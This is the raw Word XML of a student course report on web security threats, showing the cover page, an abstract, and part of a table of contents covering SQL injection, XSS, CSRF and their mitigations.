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6340636"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="03C0119C" w14:textId="35CF14FE" w:rsidR="00DA3E77" w:rsidRDefault="00DA3E77" w:rsidP="00D021E0">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
          </w:pPr>
          <w:r w:rsidRPr="00DA3E77">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D54A71D" wp14:editId="039BCC5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16"/>
                                  <w:gridCol w:w="2195"/>
                                </w:tblGrid>
                                <w:tr w:rsidR="00DA3E77" w14:paraId="055D15F8" w14:textId="77777777">
                                  <w:trPr>
                                    <w:jc w:val="center"/>
                                  </w:trPr>
                                  <w:tc>
                                    <w:tcPr>
                                      <w:tcW w:w="2568" w:type="pct"/>
                                      <w:vAlign w:val="center"/>
                                    </w:tcPr>
                                    <w:p w14:paraId="3BE3BE42" w14:textId="77777777" w:rsidR="00DA3E77" w:rsidRDefault="00DA3E77">
                                      <w:pPr>
                                        <w:jc w:val="right"/>
                                      </w:pPr>
                                      <w:r>
                                        <w:rPr>
                                          <w:noProof/>
                                        </w:rPr>
                                        <w:drawing>
                                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09DD616A" wp14:editId="4D23DE62">
                                            <wp:extent cx="2728547" cy="383133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728547"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06BE33" w14:textId="3395BA9C" w:rsidR="00DA3E77" w:rsidRDefault="00DA3E77">
                                          <w:pPr>
                                            <w:pStyle w:val="NoSpacing"/>
                                            <w:spacing w:line="312" w:lineRule="auto"/>
                                            <w:jc w:val="right"/>
                                            <w:rPr>
                                              <w:caps/>
                                              <w:color w:val="191919" w:themeColor="text1" w:themeTint="E6"/>
                                              <w:sz w:val="72"/>
                                              <w:szCs w:val="72"/>
                                            </w:rPr>
                                          </w:pPr>
                                          <w:r w:rsidRPr="00DA3E77">
                                            <w:rPr>
                                              <w:caps/>
                                              <w:color w:val="191919" w:themeColor="text1" w:themeTint="E6"/>
                                              <w:sz w:val="72"/>
                                              <w:szCs w:val="72"/>
                                            </w:rPr>
                                            <w:t>Research on Web Security Threats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BB644C" w14:textId="68F245D5" w:rsidR="00DA3E77" w:rsidRDefault="00126BFE">
                                          <w:pPr>
                                            <w:jc w:val="right"/>
                                            <w:rPr>
                                              <w:sz w:val="24"/>
                                              <w:szCs w:val="24"/>
                                            </w:rPr>
                                          </w:pPr>
                                          <w:r>
                                            <w:rPr>
                                              <w:color w:val="000000" w:themeColor="text1"/>
                                              <w:sz w:val="24"/>
                                              <w:szCs w:val="24"/>
                                            </w:rPr>
                                            <w:t>C028/401616/2023</w:t>
                                          </w:r>
                                        </w:p>
                                      </w:sdtContent>
                                    </w:sdt>
                                  </w:tc>
                                  <w:tc>
                                    <w:tcPr>
                                      <w:tcW w:w="2432" w:type="pct"/>
                                      <w:vAlign w:val="center"/>
                                    </w:tcPr>
                                    <w:p w14:paraId="19C2563C" w14:textId="7C506EE0" w:rsidR="00DA3E77" w:rsidRPr="00E857F3" w:rsidRDefault="00DA3E77">
                                      <w:pPr>
                                        <w:pStyle w:val="NoSpacing"/>
                                        <w:rPr>
                                          <w:caps/>
                                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                          <w:sz w:val="26"/>
                                          <w:szCs w:val="26"/>
                                          <w:u w:val="single"/>
                                        </w:rPr>
                                      </w:pPr>
                                      <w:r w:rsidRPr="00E857F3">
                                        <w:rPr>
                                          <w:caps/>
                                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                          <w:sz w:val="26"/>
                                          <w:szCs w:val="26"/>
                                          <w:u w:val="single"/>
                                        </w:rPr>
                                        <w:t>COURSE TITLE</w:t>
                                      </w:r>
                                      <w:r>
                                        <w:rPr>
                                          <w:caps/>
                                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                          <w:sz w:val="26"/>
                                          <w:szCs w:val="26"/>
                                        </w:rPr>
                                        <w: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031D77A" w14:textId="52786B3C" w:rsidR="00DA3E77" w:rsidRDefault="00DA3E77">
                                          <w:pPr>
                                            <w:rPr>
                                              <w:color w:val="000000" w:themeColor="text1"/>
                                            </w:rPr>
                                          </w:pPr>
                                          <w:r>
                                            <w:rPr>
                                              <w:color w:val="000000" w:themeColor="text1"/>
                                            </w:rPr>
                                            <w:t xml:space="preserve"> INTERNET APPPLICATION PROGRAMMING</w:t>
                                          </w:r>
                                        </w:p>
                                      </w:sdtContent>
                                    </w:sdt>
                                    <w:sdt>
                                      <w:sdtPr>
                                        <w:rPr>
                                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                          <w:sz w:val="26"/>
                                          <w:szCs w:val="26"/>
                                          <w:u w:val="singl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3242ABB" w14:textId="72635DFA" w:rsidR="00DA3E77" w:rsidRDefault="00DA3E77">
                                          <w:pPr>
                                            <w:pStyle w:val="NoSpacing"/>
                                            <w:rPr>
                                              <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                              <w:sz w:val="26"/>
                                              <w:szCs w:val="26"/>
                                            </w:rPr>
                                          </w:pPr>
                                          <w:r w:rsidRPr="00E857F3">
                                            <w:rPr>
                                              <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                              <w:sz w:val="26"/>
                                              <w:szCs w:val="26"/>
                                              <w:u w:val="single"/>
                                            </w:rPr>
                                            <w:t>LECTURER:</w:t>
                                          </w:r>
                                        </w:p>
                                      </w:sdtContent>
                                    </w:sdt>
                                    <w:p w14:paraId="1D87FF62" w14:textId="5754F163" w:rsidR="00DA3E77"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gramStart"/>
                                          <w:r w:rsidR="00126BFE" w:rsidRPr="00E857F3">
                                            <w:rPr>
                                              <w:color w:val="44546A" w:themeColor="text2"/>
                                            </w:rPr>
                                            <w:t>DR.RICHARD</w:t>
                                          </w:r>
                                          <w:proofErr w:type="gramEnd"/>
                                          <w:r w:rsidR="00126BFE" w:rsidRPr="00E857F3">
                                            <w:rPr>
                                              <w:color w:val="44546A" w:themeColor="text2"/>
                                            </w:rPr>
                                            <w:t xml:space="preserve"> OMOLO.</w:t>
                                          </w:r>
                                        </w:sdtContent>
                                      </w:sdt>
                                    </w:p>
                                  </w:tc>
                                </w:tr>
                              </w:tbl>
                              <w:p w14:paraId="5F207A86" w14:textId="77777777" w:rsidR="00DA3E77" w:rsidRDefault="00DA3E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D54A71D"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016"/>
                            <w:gridCol w:w="2195"/>
                          </w:tblGrid>
                          <w:tr w:rsidR="00DA3E77" w14:paraId="055D15F8" w14:textId="77777777">
                            <w:trPr>
                              <w:jc w:val="center"/>
                            </w:trPr>
                            <w:tc>
                              <w:tcPr>
                                <w:tcW w:w="2568" w:type="pct"/>
                                <w:vAlign w:val="center"/>
                              </w:tcPr>
                              <w:p w14:paraId="3BE3BE42" w14:textId="77777777" w:rsidR="00DA3E77" w:rsidRDefault="00DA3E77">
                                <w:pPr>
                                  <w:jc w:val="right"/>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:drawing>
                                    <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09DD616A" wp14:editId="4D23DE62">
                                      <wp:extent cx="2728547" cy="3831336"/>
                                      <wp:effectExtent l="0" t="0" r="0" b="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728547"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B06BE33" w14:textId="3395BA9C" w:rsidR="00DA3E77" w:rsidRDefault="00DA3E77">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:spacing w:line="312" w:lineRule="auto"/>
                                      <w:jc w:val="right"/>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="191919" w:themeColor="text1" w:themeTint="E6"/>
                                        <w:sz w:val="72"/>
                                        <w:szCs w:val="72"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r w:rsidRPr="00DA3E77">
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="191919" w:themeColor="text1" w:themeTint="E6"/>
                                        <w:sz w:val="72"/>
                                        <w:szCs w:val="72"/>
                                      </w:rPr>
                                      <w:t>Research on Web Security Threats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CBB644C" w14:textId="68F245D5" w:rsidR="00DA3E77" w:rsidRDefault="00126BFE">
                                    <w:pPr>
                                      <w:jc w:val="right"/>
                                      <w:rPr>
                                        <w:sz w:val="24"/>
                                        <w:szCs w:val="24"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:color w:val="000000" w:themeColor="text1"/>
                                        <w:sz w:val="24"/>
                                        <w:szCs w:val="24"/>
                                      </w:rPr>
                                      <w:t>C028/401616/2023</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                            </w:tc>
                            <w:tc>
                              <w:tcPr>
                                <w:tcW w:w="2432" w:type="pct"/>
                                <w:vAlign w:val="center"/>
                              </w:tcPr>
                              <w:p w14:paraId="19C2563C" w14:textId="7C506EE0" w:rsidR="00DA3E77" w:rsidRPr="00E857F3" w:rsidRDefault="00DA3E77">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                    <w:sz w:val="26"/>
                                    <w:szCs w:val="26"/>
                                    <w:u w:val="single"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="00E857F3">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                    <w:sz w:val="26"/>
                                    <w:szCs w:val="26"/>
                                    <w:u w:val="single"/>
                                  </w:rPr>
                                  <w:t>COURSE TITLE</w:t>
                                </w:r>
                                <w:r>
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                    <w:sz w:val="26"/>
                                    <w:szCs w:val="26"/>
                                  </w:rPr>
                                  <w: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031D77A" w14:textId="52786B3C" w:rsidR="00DA3E77" w:rsidRDefault="00DA3E77">
                                    <w:pPr>
                                      <w:rPr>
                                        <w:color w:val="000000" w:themeColor="text1"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:color w:val="000000" w:themeColor="text1"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve"> INTERNET APPPLICATION PROGRAMMING</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:sdt>
                                <w:sdtPr>
                                  <w:rPr>
                                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                    <w:sz w:val="26"/>
                                    <w:szCs w:val="26"/>
                                    <w:u w:val="single"/>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3242ABB" w14:textId="72635DFA" w:rsidR="00DA3E77" w:rsidRDefault="00DA3E77">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:rPr>
                                        <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                        <w:sz w:val="26"/>
                                        <w:szCs w:val="26"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r w:rsidRPr="00E857F3">
                                      <w:rPr>
                                        <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                        <w:sz w:val="26"/>
                                        <w:szCs w:val="26"/>
                                        <w:u w:val="single"/>
                                      </w:rPr>
                                      <w:t>LECTURER:</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w14:paraId="1D87FF62" w14:textId="5754F163" w:rsidR="00DA3E77"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gramStart"/>
                                    <w:r w:rsidR="00126BFE" w:rsidRPr="00E857F3">
                                      <w:rPr>
                                        <w:color w:val="44546A" w:themeColor="text2"/>
                                      </w:rPr>
                                      <w:t>DR.RICHARD</w:t>
                                    </w:r>
                                    <w:proofErr w:type="gramEnd"/>
                                    <w:r w:rsidR="00126BFE" w:rsidRPr="00E857F3">
                                      <w:rPr>
                                        <w:color w:val="44546A" w:themeColor="text2"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve"> OMOLO.</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                            </w:tc>
                          </w:tr>
                        </w:tbl>
                        <w:p w14:paraId="5F207A86" w14:textId="77777777" w:rsidR="00DA3E77" w:rsidRDefault="00DA3E77"/>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap anchorx="page" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="1C5E7BCF" w14:textId="33B41D7A" w:rsidR="00075C06" w:rsidRPr="00647B58"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u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00C42B93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>EB</w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="00C42B93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ECURITY</w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="00C42B93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HREATS</w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C42B93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>IN</w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> M</w:t>
      </w:r>
      <w:r w:rsidR="00C42B93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ODERN</w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> W</w:t>
      </w:r>
      <w:r w:rsidR="00C42B93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>EB</w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r w:rsidR="00C42B93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ROGRAMMING</w:t>
      </w:r>
      <w:r w:rsidR="00647B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC06DAB" w14:textId="68981EF8" w:rsidR="00075C06" w:rsidRPr="00075C06" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Report Prepared by: </w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MARCELLUS MOTITO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443C1F2C" w14:textId="2AFDE24E"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Date: </w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>FRIDAY 2</w:t>
      </w:r>
      <w:r w:rsidR="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>TH</w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>, 2025</w:t>
      </w:r>
      <w:r w:rsidR="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5184C41C" w14:textId="68DF84ED" w:rsidR="00075C06" w:rsidRPr="00967003" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Abstract</w:t>
      </w:r>
      <w:r w:rsidR="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6439F0"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This report delves into five pervasive web security threats impacting modern web programming: SQL Injection, Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Session Hijacking, and Man-in-the-Middle (MITM) Attacks. These vulnerabilities exploit deficiencies in application design, session management, and data transmission, jeopardizing user data, system integrity, and organizational trust. Each section provides an exhaustive analysis of the threat’s mechanics, a real-world case study showcasing its real-world implications, and comprehensive mitigation strategies rooted in current industry best practices. Drawing from recent incidents and authoritative sources as of March 2025, this report equips developers with actionable insights to fortify web applications against a dynamic and escalating threat landscape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FAF3D" w14:textId="39345719" w:rsidR="00075C06" w:rsidRPr="00967003" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ABLE OF CONTENTS</w:t>
      </w:r>
      <w:r w:rsidR="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C2852A" w14:textId="6EA228BA" w:rsidR="00075C06" w:rsidRPr="00C810EF" w:rsidRDefault="00C810EF" w:rsidP="00C810E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967003" w:rsidRPr="00C810EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00075C06" w:rsidRPr="00C810EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64300B26" w14:textId="734107E3" w:rsidR="00075C06" w:rsidRPr="00967003"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75C06" w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22289091"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2.1 Definition and Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093EC366"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2.2 Case Study: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MOVEit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Transfer Breach (2023)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DAE6C9"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2.3 Mitigation Strategies  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D498D8" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00075C06" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF8588D" w14:textId="1F577E8E" w:rsidR="00075C06" w:rsidRPr="00967003"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075C06" w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6A215E"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3.1 Definition and Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718EEEA2"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3.2 Case Study: British Airways XSS Attack (2018)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1365B4BD"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3.3 Mitigation Strategies  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD3821D" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00075C06" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30336901" w14:textId="04E675AC" w:rsidR="00075C06" w:rsidRPr="00967003"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075C06" w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F50165E"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4.1 Definition and Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E76E72A"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4.2 Case Study: Twitter CSRF Vulnerability (2010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328F405A"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4.3 Mitigation Strategies  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA48D8B" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00075C06" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
